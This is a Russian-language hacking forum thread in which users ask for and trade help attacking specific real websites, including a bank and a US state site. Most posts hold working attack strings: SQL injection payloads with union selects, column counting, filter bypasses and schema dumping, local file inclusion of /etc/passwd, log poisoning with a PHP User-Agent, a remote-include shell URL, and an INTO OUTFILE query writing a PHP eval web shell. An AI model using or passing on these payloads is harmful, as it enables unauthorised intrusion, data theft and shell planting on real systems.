Ваши вопросы по уязвимостям.

Подскажите как узнать таблицы с колонками в MySQL 4.0.x ? всю ночь парился и не фига,просто сайт банка нашел с sql

 

Колонки можно узнать, если есть вывод об ошибках, и есть имя таблицы у которой нужно узнать колонки. А таблицы никак не узнать, только брутом. Проверить, есть ли права на счему mysql, потом file_priv. Если есть права, то можно будет через into outfile попробовать залить, а если file_priv=N то можно будет хэши mysql юзеров вытащить и потом попытаться phpMyAdmin найти, чтобы авторизоваться

Как я знаю, PUT, DELETE, OPTIONS ничего полезного не дадут. Иногда бывает в .htaccess <Limit GET > т.е. Post запросы будут проходить.

 

http://ts.cityvibe[nogoogle].com/escorts.php?country=1[inj]&do=cityview
ORA-xxxx пишет. Значит Oracle? Раскрутите пожалуйста.

 

Вопрос по phpmyadmin: Есть уязвимый для LFI сайт _www.someurl.com/phpmyadmin/css/phpmyadmin.css.php?GLOBALS[cfg][ThemePath]=/etc&theme=passwd%00
Долго пытался найти логи apach, но так и не смог, proc/self/environ тоже не доступен для чтения. Есть ли какие-нибудь другие способы залить шелл?

 

есть такой вопрос
http://xchats.ru/forum/xf.php?s=0&ci=1&id=0&pass=&mod=show&rid=1&page=0%27

смогу ли я влепить сюда свой запрос если уязвимый гет параметр передаётся в лимит? если да то как?

 

Там нет инъекции.

Просто кривые руки.
В коде бы выглядело как-то так:

PHP:

"... LIMIT " . (($_GET['page']-1)*10) . ", 10 .. "

 

Всем привет, дайте подсказку с Smf форумом, нету прав на запись в папку тем, как залить шелл?

 

http://www.agd.state.tx.us/36id/storyquery.asp?ID=41)and(1=2)union(select(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12)from(stories)

 

Как ты подобрал количество полей здесь, объясни если не трудно?

 

Code:

http://www.agd.state.tx.us/36id/storyquery.asp?ID=41)+order+by+(10
Нет ошибки.

http://www.agd.state.tx.us/36id/storyquery.asp?ID=41)+order+by+(20
Есть ошибка.

http://www.agd.state.tx.us/36id/storyquery.asp?ID=41)+order+by+(15
Есть ошибка.

http://www.agd.state.tx.us/36id/storyquery.asp?ID=41)+order+by+(13
Есть ошибка.

http://www.agd.state.tx.us/36id/storyquery.asp?ID=41)+order+by+(12
Нет ошибки.

 

хм..
а как такое обойти?
http://www.soldatru.ru/read.php?id=-1410+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14+--+

 

Добрый вечер. Интересует, что можно сделать с этим сайтом. Проблема в том что я нашел лишь одну php-страничку. Даже кавычку подставить некуда. Не понятно так же, что за движок (походу самописный). Сканил структуру сайта меднет-сканнером - тоже ничего интересного.

Все что я смог это получить раскрытие путей, подпортив кукисы.

Буду благодарен за любую инфу, которая может помочь.

 

Можно побаловаться с IF(), но нормально ничего не вытащишь.
http://www.soldatru.ru/read.php?id=IF((SUBSTR(version(),1,1)='5'),1410,-1410)

Если правильно - покажет страницу, нет - не покажет.

регулярка на select, пробовал SeLeCT и т.п. вариации с регистром букв, не помогает.

 

Так, но вывода все равно нет

http://www.soldatru.ru/read.php?id=-1410+%75%6e%69%6f%6e%0a%73%65%6c%65%63%74+1,2,3,4,5,6,7,8,9,10,11,12,13,14+--+

 

В прочем, там и в поиске уязвимость вида SQL INJ.

Пробелы стр_реплейсятся на %, видимо для "улучшения" результатов поиска.

Вместо пробела юзать /**/

В поиск:
http://www.soldatru.ru/search.php
'/**/and/**/1=2/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,concat_ws(0x3a,user(),version()),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28/**/#

 

это вбей в search.php

'and/**/1=0/**/union/**/select/**/1,2,3,4,5,6,7,8,(select(@x)from(select(@x:=0x00),(select(null)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28#

 

Как на сайте посмотреть содержимое директории?

http://www.enu.dk/index.php?index=http://site.com/shell.php?c=ls%20-al

<?php

print(system($_GET['c']));

?>

команда не выполняется
allow_url_fopen - on
http://www.enu.dk/index.php?index=../phpinfo.php

 

Code:

include(includes/

Facepalm.

Это LFI, а не RFI. Local File Include.

http://www.enu.dk/index.php?index=../../../../etc/passwd

Дальше либо чекай /proc/self/environ/
/proc/self/fd/2 (вообще от 1 до 7)

Или ищи access логи. И заходи на страницу с юзерагентом по типу <?php phpinfo(); ?>

В курле параметр -H
-H "User-Agent: <?php phpinfo();exit(); ?>"

 

Что неправильно делаю? file_priv=y

Code:

http://wifi.hm-ugratel.ru/?m[admin]&id=',''and(select(1)from(select(count(*)),(concat((select(0x2533433F7068702532306576616C28245F524551554553545B636D645D293B25)/**/from/**/fontan.mp_gw_auth/**/into/**/outfile/**/0x2F7372762F7777772F76686F7374732F7567726174656C2E72752F7368656C6C),0x00,floor(rand(0)*2)))x/**/from(information_schema.tables)group/**/by(x))a)and'